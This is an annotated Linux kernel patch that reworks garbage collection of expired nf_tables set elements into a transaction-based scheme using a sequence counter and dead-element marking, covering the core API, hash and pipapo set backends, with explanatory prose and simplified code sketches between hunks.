+-void *nft_set_catchall_gc(const struct nft_set *set)
+-{
+-	struct nft_set_elem_catchall *catchall, *next;
+-	struct nft_set_ext *ext;
+-	void *elem = NULL;
+-
+-	list_for_each_entry_safe(catchall, next, &set->catchall_list, list) {
+-		ext = nft_set_elem_ext(set, catchall->elem);
+-
+-		if (!nft_set_elem_expired(ext) ||
+-		    nft_set_elem_mark_busy(ext))
+-			continue;
+-
+-		elem = catchall->elem;
+-		list_del_rcu(&catchall->list);
+-		kfree_rcu(catchall, rcu);
+-		break;
+-	}
+-
+-	return elem;
+-}
+-EXPORT_SYMBOL_GPL(nft_set_catchall_gc);
+-
+ static int nft_setelem_catchall_insert(const struct net *net,
+ 				       struct nft_set *set,
+ 				       const struct nft_set_elem *elem,
+@@ -6139,7 +6141,6 @@ static void nft_setelem_activate(struct net *net, struct nft_set *set,
+ 
+ 	if (nft_setelem_is_catchall(set, elem)) {
+ 		nft_set_elem_change_active(net, set, ext);
+-		nft_set_elem_clear_busy(ext);
+ 	} else {
+ 		set->ops->activate(net, set, elem);
+ 	}
+@@ -6154,8 +6155,7 @@ static int nft_setelem_catchall_deactivate(const struct net *net,
+ 
+ 	list_for_each_entry(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_is_active(net, ext) ||
+-		    nft_set_elem_mark_busy(ext))
++		if (!nft_is_active(net, ext))
+ 			continue;
+ 
+ 		kfree(elem->priv);
+@@ -6550,7 +6550,7 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 		goto err_elem_free;
+ 	}
+ 
+-	ext->genmask = nft_genmask_cur(ctx->net) | NFT_SET_ELEM_BUSY_MASK;
++	ext->genmask = nft_genmask_cur(ctx->net);
+ 
+ 	err = nft_setelem_insert(ctx->net, set, &elem, &ext2, flags);
+ 	if (err) {
+@@ -6700,9 +6700,9 @@ static void nft_setelem_data_activate(const struct net *net,
+ 		nft_use_inc_restore(&(*nft_set_ext_obj(ext))->use);
+ }
+ 
+-static void nft_setelem_data_deactivate(const struct net *net,
+-					const struct nft_set *set,
+-					struct nft_set_elem *elem)
++void nft_setelem_data_deactivate(const struct net *net,
++				 const struct nft_set *set,
++				 struct nft_set_elem *elem)
+ {
+ 	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+ 
+@@ -6866,8 +6866,7 @@ static int nft_set_catchall_flush(const struct nft_ctx *ctx,
+ 
+ 	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
+ 		ext = nft_set_elem_ext(set, catchall->elem);
+-		if (!nft_set_elem_active(ext, genmask) ||
+-		    nft_set_elem_mark_busy(ext))
++		if (!nft_set_elem_active(ext, genmask))
+ 			continue;
+ 
+ 		elem.priv = catchall->elem;
+@@ -6919,8 +6918,10 @@ static int nf_tables_delsetelem(struct sk_buff *skb,
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+ 
+-	if (!list_empty(&set->bindings) &&
+-	    (set->flags & (NFT_SET_CONSTANT | NFT_SET_ANONYMOUS)))
++	if (nft_set_is_anonymous(set))
++		return -EOPNOTSUPP;
++
++	if (!list_empty(&set->bindings) && (set->flags & NFT_SET_CONSTANT))
+ 		return -EBUSY;
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -6938,29 +6939,6 @@ static int nf_tables_delsetelem(struct sk_buff *skb,
+ 	return err;
+ }
+ 
+-void nft_set_gc_batch_release(struct rcu_head *rcu)
+-{
+-	struct nft_set_gc_batch *gcb;
+-	unsigned int i;
+-
+-	gcb = container_of(rcu, struct nft_set_gc_batch, head.rcu);
+-	for (i = 0; i < gcb->head.cnt; i++)
+-		nft_set_elem_destroy(gcb->head.set, gcb->elems[i], true);
+-	kfree(gcb);
+-}
+-
+-struct nft_set_gc_batch *nft_set_gc_batch_alloc(const struct nft_set *set,
+-						gfp_t gfp)
+-{
+-	struct nft_set_gc_batch *gcb;
+-
+-	gcb = kzalloc(sizeof(*gcb), gfp);
+-	if (gcb == NULL)
+-		return gcb;
+-	gcb->head.set = set;
+-	return gcb;
+-}
+-
+ /*
+  * Stateful objects
+  */
+@@ -9089,6 +9067,234 @@ void nft_chain_del(struct nft_chain *chain)
+ 	list_del_rcu(&chain->list);
+ }
+ 
++static void nft_trans_gc_setelem_remove(struct nft_ctx *ctx,
++					struct nft_trans_gc *trans)
++{
++	void **priv = trans->priv;
++	unsigned int i;
++
++	for (i = 0; i < trans->count; i++) {
++		struct nft_set_elem elem = {
++			.priv = priv[i],
++		};
++
++		nft_setelem_data_deactivate(ctx->net, trans->set, &elem);
++		nft_setelem_remove(ctx->net, trans->set, &elem);
++	}
++}
++
++void nft_trans_gc_destroy(struct nft_trans_gc *trans)
++{
++	nft_set_put(trans->set);
++	put_net(trans->net);
++	kfree(trans);
++}
++
++static void nft_trans_gc_trans_free(struct rcu_head *rcu)
++{
++	struct nft_set_elem elem = {};
++	struct nft_trans_gc *trans;
++	struct nft_ctx ctx = {};
++	unsigned int i;
++
++	trans = container_of(rcu, struct nft_trans_gc, rcu);
++	ctx.net	= read_pnet(&trans->set->net);
++
++	for (i = 0; i < trans->count; i++) {
++		elem.priv = trans->priv[i];
++		if (!nft_setelem_is_catchall(trans->set, &elem))
++			atomic_dec(&trans->set->nelems);
++
++		nf_tables_set_elem_destroy(&ctx, trans->set, elem.priv);
++	}
++
++	nft_trans_gc_destroy(trans);
++}
++
++static bool nft_trans_gc_work_done(struct nft_trans_gc *trans)
++{
++	struct nftables_pernet *nft_net;
++	struct nft_ctx ctx = {};
++
++	nft_net = nft_pernet(trans->net);
++
++	mutex_lock(&nft_net->commit_mutex);
++
++	/* Check for a race with the transaction path, otherwise this batch
++	 * refers to stale objects that might not be there anymore. Also skip
++	 * if the set has been destroyed from a control plane transaction, in
++	 * case the gc worker lost the race.
++	 */
++	if (READ_ONCE(nft_net->gc_seq) != trans->seq || trans->set->dead) {
++		mutex_unlock(&nft_net->commit_mutex);
++		return false;
++	}
++
++	ctx.net = trans->net;
++	ctx.table = trans->set->table;
++
++	nft_trans_gc_setelem_remove(&ctx, trans);
++	mutex_unlock(&nft_net->commit_mutex);
++
++	return true;
++}
++
++static void nft_trans_gc_work(struct work_struct *work)
++{
++	struct nft_trans_gc *trans, *next;
++	LIST_HEAD(trans_gc_list);
++
++	spin_lock(&nf_tables_gc_list_lock);
++	list_splice_init(&nf_tables_gc_list, &trans_gc_list);
++	spin_unlock(&nf_tables_gc_list_lock);
++
++	list_for_each_entry_safe(trans, next, &trans_gc_list, list) {
++		list_del(&trans->list);
++		if (!nft_trans_gc_work_done(trans)) {
++			nft_trans_gc_destroy(trans);
++			continue;
++		}
++		call_rcu(&trans->rcu, nft_trans_gc_trans_free);
++	}
++}
++
++struct nft_trans_gc *nft_trans_gc_alloc(struct nft_set *set,
++					unsigned int gc_seq, gfp_t gfp)
++{
++	struct net *net = read_pnet(&set->net);
++	struct nft_trans_gc *trans;
++
++	trans = kzalloc(sizeof(*trans), gfp);
++	if (!trans)
++		return NULL;
++
++	trans->net = maybe_get_net(net);
++	if (!trans->net) {
++		kfree(trans);
++		return NULL;
++	}
++
++	refcount_inc(&set->refs);
++	trans->set = set;
++	trans->seq = gc_seq;
++
++	return trans;
++}
++
++void nft_trans_gc_elem_add(struct nft_trans_gc *trans, void *priv)
++{
++	trans->priv[trans->count++] = priv;
++}
++
++static void nft_trans_gc_queue_work(struct nft_trans_gc *trans)
++{
++	spin_lock(&nf_tables_gc_list_lock);
++	list_add_tail(&trans->list, &nf_tables_gc_list);
++	spin_unlock(&nf_tables_gc_list_lock);
++
++	schedule_work(&trans_gc_work);
++}
++
++static int nft_trans_gc_space(struct nft_trans_gc *trans)
++{
++	return NFT_TRANS_GC_BATCHCOUNT - trans->count;
++}
++
++struct nft_trans_gc *nft_trans_gc_queue_async(struct nft_trans_gc *gc,
++					      unsigned int gc_seq, gfp_t gfp)
++{
++	struct nft_set *set;
++
++	if (nft_trans_gc_space(gc))
++		return gc;
++
++	set = gc->set;
++	nft_trans_gc_queue_work(gc);
++
++	return nft_trans_gc_alloc(set, gc_seq, gfp);
++}
++
++void nft_trans_gc_queue_async_done(struct nft_trans_gc *trans)
++{
++	if (trans->count == 0) {
++		nft_trans_gc_destroy(trans);
++		return;
++	}
++
++	nft_trans_gc_queue_work(trans);
++}
++
++struct nft_trans_gc *nft_trans_gc_queue_sync(struct nft_trans_gc *gc, gfp_t gfp)
++{
++	struct nft_set *set;
++
++	if (WARN_ON_ONCE(!lockdep_commit_lock_is_held(gc->net)))
++		return NULL;
++
++	if (nft_trans_gc_space(gc))
++		return gc;
++
++	set = gc->set;
++	call_rcu(&gc->rcu, nft_trans_gc_trans_free);
++
++	return nft_trans_gc_alloc(set, 0, gfp);
++}
++
++void nft_trans_gc_queue_sync_done(struct nft_trans_gc *trans)
++{
++	WARN_ON_ONCE(!lockdep_commit_lock_is_held(trans->net));
++
++	if (trans->count == 0) {
++		nft_trans_gc_destroy(trans);
++		return;
++	}
++
++	call_rcu(&trans->rcu, nft_trans_gc_trans_free);
++}
++
++static struct nft_trans_gc *nft_trans_gc_catchall(struct nft_trans_gc *gc,
++						  unsigned int gc_seq,
++						  bool sync)
++{
++	struct nft_set_elem_catchall *catchall;
++	const struct nft_set *set = gc->set;
++	struct nft_set_ext *ext;
++
++	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++
++		if (!nft_set_elem_expired(ext))
++			continue;
++		if (nft_set_elem_is_dead(ext))
++			goto dead_elem;
++
++		nft_set_elem_dead(ext);
++dead_elem:
++		if (sync)
++			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++		else
++			gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++
++		if (!gc)
++			return NULL;
++
++		nft_trans_gc_elem_add(gc, catchall->elem);
++	}
++
++	return gc;
++}
++
++struct nft_trans_gc *nft_trans_gc_catchall_async(struct nft_trans_gc *gc,
++						 unsigned int gc_seq)
++{
++	return nft_trans_gc_catchall(gc, gc_seq, false);
++}
++
++struct nft_trans_gc *nft_trans_gc_catchall_sync(struct nft_trans_gc *gc)
++{
++	return nft_trans_gc_catchall(gc, 0, true);
++}
++
+ static void nf_tables_module_autoload_cleanup(struct net *net)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+@@ -9247,15 +9453,31 @@ static void nft_set_commit_update(struct list_head *set_update_list)
+ 	}
+ }
+ 
++static unsigned int nft_gc_seq_begin(struct nftables_pernet *nft_net)
++{
++	unsigned int gc_seq;
++
++	/* Bump the gc counter; an odd value is the busy mark. */
++	gc_seq = READ_ONCE(nft_net->gc_seq);
++	WRITE_ONCE(nft_net->gc_seq, ++gc_seq);
++
++	return gc_seq;
++}
++
++static void nft_gc_seq_end(struct nftables_pernet *nft_net, unsigned int gc_seq)
++{
++	WRITE_ONCE(nft_net->gc_seq, ++gc_seq);
++}
++
+ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct nft_trans *trans, *next;
++	unsigned int base_seq, gc_seq;
+ 	LIST_HEAD(set_update_list);
+ 	struct nft_trans_elem *te;
+ 	struct nft_chain *chain;
+ 	struct nft_table *table;
+-	unsigned int base_seq;
+ 	LIST_HEAD(adl);
+ 	int err;
+ 
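
nft_gc_seq_begin() and nft_gc_seq_end() implement a sequence-counter handshake between the commit path and the async gc workers: the counter is bumped to an odd value while the ruleset is being mutated and back to even when the mutation is done, and a worker that snapshotted the counter earlier discards its batch if the value has changed. A condensed sketch of the two sides, with standalone names and the writer assumed to run under the commit mutex:

static unsigned int gc_seq;	/* even: idle, odd: commit in progress */

/* writer side, serialized by the commit mutex */
static unsigned int seq_begin(void)
{
	unsigned int seq = READ_ONCE(gc_seq);

	WRITE_ONCE(gc_seq, ++seq);	/* now odd: busy */
	return seq;
}

static void seq_end(unsigned int seq)
{
	WRITE_ONCE(gc_seq, ++seq);	/* even again: idle */
}

/* reader side (gc worker): snapshot first, revalidate before committing work */
static bool snapshot_still_valid(unsigned int snapshot)
{
	return READ_ONCE(gc_seq) == snapshot;
}
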
+@@ -9332,6 +9554,8 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 
+ 	WRITE_ONCE(nft_net->base_seq, base_seq);
+ 
++	gc_seq = nft_gc_seq_begin(nft_net);
++
+ 	/* step 3. Start new generation, rules_gen_X now in use. */
+ 	net->nft.gencursor = nft_gencursor_next(net);
+ 
+@@ -9420,6 +9644,7 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_DELSET:
++			nft_trans_set(trans)->dead = 1;
+ 			list_del_rcu(&nft_trans_set(trans)->list);
+ 			nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),
+ 					     NFT_MSG_DELSET, GFP_KERNEL);
+@@ -9519,6 +9744,8 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 	nft_commit_notify(net, NETLINK_CB(skb).portid);
+ 	nf_tables_gen_notify(net, skb, NFT_MSG_NEWGEN);
+ 	nf_tables_commit_audit_log(&adl, nft_net->base_seq);
++
++	nft_gc_seq_end(nft_net, gc_seq);
+ 	nf_tables_commit_release(net);
+ 
+ 	return 0;
+@@ -9777,7 +10004,12 @@ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 			   enum nfnl_abort_action action)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+-	int ret = __nf_tables_abort(net, action);
++	unsigned int gc_seq;
++	int ret;
++
++	gc_seq = nft_gc_seq_begin(nft_net);
++	ret = __nf_tables_abort(net, action);
++	nft_gc_seq_end(nft_net, gc_seq);
+ 
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 
+@@ -10440,7 +10672,7 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	ctx.family = table->family;
+ 	ctx.table = table;
+ 	list_for_each_entry(chain, &table->chains, list) {
+-		if (nft_chain_is_bound(chain))
++		if (nft_chain_binding(chain))
+ 			continue;
+ 
+ 		ctx.chain = chain;
+@@ -10501,6 +10733,7 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 	struct net *net = n->net;
+ 	unsigned int deleted;
+ 	bool restart = false;
++	unsigned int gc_seq;
+ 
+ 	if (event != NETLINK_URELEASE || n->protocol != NETLINK_NETFILTER)
+ 		return NOTIFY_DONE;
+@@ -10508,6 +10741,9 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 	nft_net = nft_pernet(net);
+ 	deleted = 0;
+ 	mutex_lock(&nft_net->commit_mutex);
++
++	gc_seq = nft_gc_seq_begin(nft_net);
++
+ 	if (!list_empty(&nf_tables_destroy_list))
+ 		nf_tables_trans_destroy_flush_work();
+ again:
+@@ -10530,6 +10766,8 @@ again:
+ 		if (restart)
+ 			goto again;
+ 	}
++	nft_gc_seq_end(nft_net, gc_seq);
++
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 
+ 	return NOTIFY_DONE;
+@@ -10551,6 +10789,7 @@ static int __net_init nf_tables_init_net(struct net *net)
+ 	mutex_init(&nft_net->commit_mutex);
+ 	nft_net->base_seq = 1;
+ 	nft_net->validate_state = NFT_VALIDATE_SKIP;
++	nft_net->gc_seq = 0;
+ 
+ 	return 0;
+ }
+@@ -10567,22 +10806,36 @@ static void __net_exit nf_tables_pre_exit_net(struct net *net)
+ static void __net_exit nf_tables_exit_net(struct net *net)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
++	unsigned int gc_seq;
+ 
+ 	mutex_lock(&nft_net->commit_mutex);
++
++	gc_seq = nft_gc_seq_begin(nft_net);
++
+ 	if (!list_empty(&nft_net->commit_list) ||
+ 	    !list_empty(&nft_net->module_list))
+ 		__nf_tables_abort(net, NFNL_ABORT_NONE);
++
+ 	__nft_release_tables(net);
++
++	nft_gc_seq_end(nft_net, gc_seq);
++
+ 	mutex_unlock(&nft_net->commit_mutex);
+ 	WARN_ON_ONCE(!list_empty(&nft_net->tables));
+ 	WARN_ON_ONCE(!list_empty(&nft_net->module_list));
+ 	WARN_ON_ONCE(!list_empty(&nft_net->notify_list));
+ }
+ 
++static void nf_tables_exit_batch(struct list_head *net_exit_list)
++{
++	flush_work(&trans_gc_work);
++}
++
+ static struct pernet_operations nf_tables_net_ops = {
+ 	.init		= nf_tables_init_net,
+ 	.pre_exit	= nf_tables_pre_exit_net,
+ 	.exit		= nf_tables_exit_net,
++	.exit_batch	= nf_tables_exit_batch,
+ 	.id		= &nf_tables_net_id,
+ 	.size		= sizeof(struct nftables_pernet),
+ };
+@@ -10654,6 +10907,7 @@ static void __exit nf_tables_module_exit(void)
+ 	nft_chain_filter_fini();
+ 	nft_chain_route_fini();
+ 	unregister_pernet_subsys(&nf_tables_net_ops);
++	cancel_work_sync(&trans_gc_work);
+ 	cancel_work_sync(&trans_destroy_work);
+ 	rcu_barrier();
+ 	rhltable_destroy(&nft_objname_ht);
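
Taken together, the nft_trans_gc_* helpers added above give every set backend the same batching loop: allocate a batch tagged with the current gc sequence, mark each expired element dead, append it (flushing to the worker and reallocating whenever the batch fills up), then hand the final batch over. A condensed skeleton of an async caller, mirroring the rhash and rbtree workers changed below; the backend-specific walk is elided to a comment:

/* Sketch of one async gc pass; ext/elem_priv come from the backend walk. */
static void example_async_gc(struct nft_set *set,
			     struct nftables_pernet *nft_net)
{
	unsigned int gc_seq = READ_ONCE(nft_net->gc_seq);
	struct nft_trans_gc *gc;

	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
	if (!gc)
		return;

	/*
	 * Backend-specific walk goes here. For each expired element:
	 *
	 *	nft_set_elem_dead(ext);			- logical delete only
	 *	gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
	 *	if (!gc)
	 *		return;				- flush/realloc failed
	 *	nft_trans_gc_elem_add(gc, elem_priv);
	 */

	gc = nft_trans_gc_catchall_async(gc, gc_seq);
	if (gc)
		nft_trans_gc_queue_async_done(gc);	/* schedules trans_gc_work */
}
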
+diff --git a/net/netfilter/nft_set_hash.c b/net/netfilter/nft_set_hash.c
+index 0b73cb0e752f7..2013de934cef0 100644
+--- a/net/netfilter/nft_set_hash.c
++++ b/net/netfilter/nft_set_hash.c
+@@ -59,6 +59,8 @@ static inline int nft_rhash_cmp(struct rhashtable_compare_arg *arg,
+ 
+ 	if (memcmp(nft_set_ext_key(&he->ext), x->key, x->set->klen))
+ 		return 1;
++	if (nft_set_elem_is_dead(&he->ext))
++		return 1;
+ 	if (nft_set_elem_expired(&he->ext))
+ 		return 1;
+ 	if (!nft_set_elem_active(&he->ext, x->genmask))
+@@ -188,7 +190,6 @@ static void nft_rhash_activate(const struct net *net, const struct nft_set *set,
+ 	struct nft_rhash_elem *he = elem->priv;
+ 
+ 	nft_set_elem_change_active(net, set, &he->ext);
+-	nft_set_elem_clear_busy(&he->ext);
+ }
+ 
+ static bool nft_rhash_flush(const struct net *net,
+@@ -196,12 +197,9 @@ static bool nft_rhash_flush(const struct net *net,
+ {
+ 	struct nft_rhash_elem *he = priv;
+ 
+-	if (!nft_set_elem_mark_busy(&he->ext) ||
+-	    !nft_is_active(net, &he->ext)) {
+-		nft_set_elem_change_active(net, set, &he->ext);
+-		return true;
+-	}
+-	return false;
++	nft_set_elem_change_active(net, set, &he->ext);
++
++	return true;
+ }
+ 
+ static void *nft_rhash_deactivate(const struct net *net,
+@@ -218,9 +216,8 @@ static void *nft_rhash_deactivate(const struct net *net,
+ 
+ 	rcu_read_lock();
+ 	he = rhashtable_lookup(&priv->ht, &arg, nft_rhash_params);
+-	if (he != NULL &&
+-	    !nft_rhash_flush(net, set, he))
+-		he = NULL;
++	if (he)
++		nft_set_elem_change_active(net, set, &he->ext);
+ 
+ 	rcu_read_unlock();
+ 
+@@ -252,7 +249,9 @@ static bool nft_rhash_delete(const struct nft_set *set,
+ 	if (he == NULL)
+ 		return false;
+ 
+-	return rhashtable_remove_fast(&priv->ht, &he->node, nft_rhash_params) == 0;
++	nft_set_elem_dead(&he->ext);
++
++	return true;
+ }
+ 
+ static void nft_rhash_walk(const struct nft_ctx *ctx, struct nft_set *set,
+@@ -278,8 +277,6 @@ static void nft_rhash_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 		if (iter->count < iter->skip)
+ 			goto cont;
+-		if (nft_set_elem_expired(&he->ext))
+-			goto cont;
+ 		if (!nft_set_elem_active(&he->ext, iter->genmask))
+ 			goto cont;
+ 
+@@ -314,25 +311,48 @@ static bool nft_rhash_expr_needs_gc_run(const struct nft_set *set,
+ 
+ static void nft_rhash_gc(struct work_struct *work)
+ {
++	struct nftables_pernet *nft_net;
+ 	struct nft_set *set;
+ 	struct nft_rhash_elem *he;
+ 	struct nft_rhash *priv;
+-	struct nft_set_gc_batch *gcb = NULL;
+ 	struct rhashtable_iter hti;
++	struct nft_trans_gc *gc;
++	struct net *net;
++	u32 gc_seq;
+ 
+ 	priv = container_of(work, struct nft_rhash, gc_work.work);
+ 	set  = nft_set_container_of(priv);
++	net  = read_pnet(&set->net);
++	nft_net = nft_pernet(net);
++	gc_seq = READ_ONCE(nft_net->gc_seq);
++
++	if (nft_set_gc_is_pending(set))
++		goto done;
++
++	gc = nft_trans_gc_alloc(set, gc_seq, GFP_KERNEL);
++	if (!gc)
++		goto done;
+ 
+ 	rhashtable_walk_enter(&priv->ht, &hti);
+ 	rhashtable_walk_start(&hti);
+ 
+ 	while ((he = rhashtable_walk_next(&hti))) {
+ 		if (IS_ERR(he)) {
+-			if (PTR_ERR(he) != -EAGAIN)
+-				break;
+-			continue;
++			nft_trans_gc_destroy(gc);
++			gc = NULL;
++			goto try_later;
++		}
++
++		/* Ruleset has been updated, try later. */
++		if (READ_ONCE(nft_net->gc_seq) != gc_seq) {
++			nft_trans_gc_destroy(gc);
++			gc = NULL;
++			goto try_later;
+ 		}
+ 
++		if (nft_set_elem_is_dead(&he->ext))
++			goto dead_elem;
++
+ 		if (nft_set_ext_exists(&he->ext, NFT_SET_EXT_EXPRESSIONS) &&
+ 		    nft_rhash_expr_needs_gc_run(set, &he->ext))
+ 			goto needs_gc_run;
+@@ -340,26 +360,26 @@ static void nft_rhash_gc(struct work_struct *work)
+ 		if (!nft_set_elem_expired(&he->ext))
+ 			continue;
+ needs_gc_run:
+-		if (nft_set_elem_mark_busy(&he->ext))
+-			continue;
++		nft_set_elem_dead(&he->ext);
++dead_elem:
++		gc = nft_trans_gc_queue_async(gc, gc_seq, GFP_ATOMIC);
++		if (!gc)
++			goto try_later;
+ 
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (gcb == NULL)
+-			break;
+-		rhashtable_remove_fast(&priv->ht, &he->node, nft_rhash_params);
+-		atomic_dec(&set->nelems);
+-		nft_set_gc_batch_add(gcb, he);
++		nft_trans_gc_elem_add(gc, he);
+ 	}
++
++	gc = nft_trans_gc_catchall_async(gc, gc_seq);
++
++try_later:
++	/* catchall list iteration requires rcu read side lock. */
+ 	rhashtable_walk_stop(&hti);
+ 	rhashtable_walk_exit(&hti);
+ 
+-	he = nft_set_catchall_gc(set);
+-	if (he) {
+-		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
+-		if (gcb)
+-			nft_set_gc_batch_add(gcb, he);
+-	}
+-	nft_set_gc_batch_complete(gcb);
++	if (gc)
++		nft_trans_gc_queue_async_done(gc);
++
++done:
+ 	queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
+ 			   nft_set_gc_interval(set));
+ }
+@@ -394,7 +414,7 @@ static int nft_rhash_init(const struct nft_set *set,
+ 		return err;
+ 
+ 	INIT_DEFERRABLE_WORK(&priv->gc_work, nft_rhash_gc);
+-	if (set->flags & NFT_SET_TIMEOUT)
++	if (set->flags & (NFT_SET_TIMEOUT | NFT_SET_EVAL))
+ 		nft_rhash_gc_init(set);
+ 
+ 	return 0;
+@@ -422,7 +442,6 @@ static void nft_rhash_destroy(const struct nft_ctx *ctx,
+ 	};
+ 
+ 	cancel_delayed_work_sync(&priv->gc_work);
+-	rcu_barrier();
+ 	rhashtable_free_and_destroy(&priv->ht, nft_rhash_elem_destroy,
+ 				    (void *)&rhash_ctx);
+ }
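
The rhash changes make deletion from the datapath purely logical: nft_rhash_delete() only flips the element's dead bit, lookup and cmp treat a dead element as a mismatch, and the physical removal happens later in the gc worker under the commit mutex. A plausible minimal version of the mark/test helpers, assuming a spare bit in the extension's genmask word; the real NFT_SET_ELEM_DEAD_BIT layout in nf_tables.h may differ:

#include <linux/bitops.h>

#define ELEM_DEAD_BIT	3	/* illustrative bit position */

/* atomic: deletion can race with lookups and with the gc worker */
static inline void elem_set_dead(unsigned long *genmask_word)
{
	set_bit(ELEM_DEAD_BIT, genmask_word);
}

static inline bool elem_is_dead(const unsigned long *genmask_word)
{
	return test_bit(ELEM_DEAD_BIT, genmask_word);
}
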
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 8c16681884b7e..deea6196d9925 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -566,8 +566,9 @@ next_match:
+ 			goto out;
+ 
+ 		if (last) {
+-			if (nft_set_elem_expired(&f->mt[b].e->ext) ||
+-			    (genmask &&
++			if (nft_set_elem_expired(&f->mt[b].e->ext))
++				goto next_match;
++			if ((genmask &&
+ 			     !nft_set_elem_active(&f->mt[b].e->ext, genmask)))
+ 				goto next_match;
+ 
+@@ -602,7 +603,7 @@ static void *nft_pipapo_get(const struct net *net, const struct nft_set *set,
+ 			    const struct nft_set_elem *elem, unsigned int flags)
+ {
+ 	return pipapo_get(net, set, (const u8 *)elem->key.val.data,
+-			  nft_genmask_cur(net));
++			 nft_genmask_cur(net));
+ }
+ 
+ /**
+@@ -1536,16 +1537,34 @@ static void pipapo_drop(struct nft_pipapo_match *m,
+ 	}
+ }
+ 
++static void nft_pipapo_gc_deactivate(struct net *net, struct nft_set *set,
++				     struct nft_pipapo_elem *e)
++
++{
++	struct nft_set_elem elem = {
++		.priv	= e,
++	};
++
++	nft_setelem_data_deactivate(net, set, &elem);
++}
++
+ /**
+  * pipapo_gc() - Drop expired entries from set, destroy start and end elements
+- * @set:	nftables API set representation
++ * @_set:	nftables API set representation
+  * @m:		Matching data
+  */
+-static void pipapo_gc(const struct nft_set *set, struct nft_pipapo_match *m)
++static void pipapo_gc(const struct nft_set *_set, struct nft_pipapo_match *m)
+ {
++	struct nft_set *set = (struct nft_set *) _set;
+ 	struct nft_pipapo *priv = nft_set_priv(set);
++	struct net *net = read_pnet(&set->net);
+ 	int rules_f0, first_rule = 0;
+ 	struct nft_pipapo_elem *e;
++	struct nft_trans_gc *gc;
++
++	gc = nft_trans_gc_alloc(set, 0, GFP_KERNEL);
++	if (!gc)
++		return;
+ 
+ 	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
+ 		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
+@@ -1569,13 +1588,20 @@ static void pipapo_gc(const struct nft_set *set, struct nft_pipapo_match *m)
+ 		f--;
+ 		i--;
+ 		e = f->mt[rulemap[i].to].e;
+-		if (nft_set_elem_expired(&e->ext) &&
+-		    !nft_set_elem_mark_busy(&e->ext)) {
++
++		/* synchronous gc never fails, so there is no need to set
++		 * NFT_SET_ELEM_DEAD_BIT.
++		 */
++		if (nft_set_elem_expired(&e->ext)) {
+ 			priv->dirty = true;
+-			pipapo_drop(m, rulemap);
+ 
+-			rcu_barrier();
+-			nft_set_elem_destroy(set, e, true);
++			gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
++			if (!gc)
++				return;
++
++			nft_pipapo_gc_deactivate(net, set, e);
++			pipapo_drop(m, rulemap);
++			nft_trans_gc_elem_add(gc, e);
+ 
+ 			/* And check again current first rule, which is now the
+ 			 * first we haven't checked.
+@@ -1585,11 +1611,11 @@ static void pipapo_gc(const struct nft_set *set, struct nft_pipapo_match *m)
+ 		}
+ 	}
+ 
+-	e = nft_set_catchall_gc(set);
+-	if (e)
+-		nft_set_elem_destroy(set, e, true);
+-
+-	priv->last_gc = jiffies;
++	gc = nft_trans_gc_catchall_sync(gc);
++	if (gc) {
++		nft_trans_gc_queue_sync_done(gc);
++		priv->last_gc = jiffies;
++	}
+ }
+ 
+ /**
+@@ -1718,14 +1744,9 @@ static void nft_pipapo_activate(const struct net *net,
+ 				const struct nft_set *set,
+ 				const struct nft_set_elem *elem)
+ {
+-	struct nft_pipapo_elem *e;
+-
+-	e = pipapo_get(net, set, (const u8 *)elem->key.val.data, 0);
+-	if (IS_ERR(e))
+-		return;
++	struct nft_pipapo_elem *e = elem->priv;
+ 
+ 	nft_set_elem_change_active(net, set, &e->ext);
+-	nft_set_elem_clear_busy(&e->ext);
+ }
+ 
+ /**
+@@ -1937,10 +1958,6 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 
+ 	data = (const u8 *)nft_set_ext_key(&e->ext);
+ 
+-	e = pipapo_get(net, set, data, 0);
+-	if (IS_ERR(e))
+-		return;
+-
+ 	while ((rules_f0 = pipapo_rules_same_key(m->f, first_rule))) {
+ 		union nft_pipapo_map_bucket rulemap[NFT_PIPAPO_MAX_FIELDS];
+ 		const u8 *match_start, *match_end;
+@@ -2024,8 +2041,6 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 			goto cont;
+ 
+ 		e = f->mt[r].e;
+-		if (nft_set_elem_expired(&e->ext))
+-			goto cont;
+ 
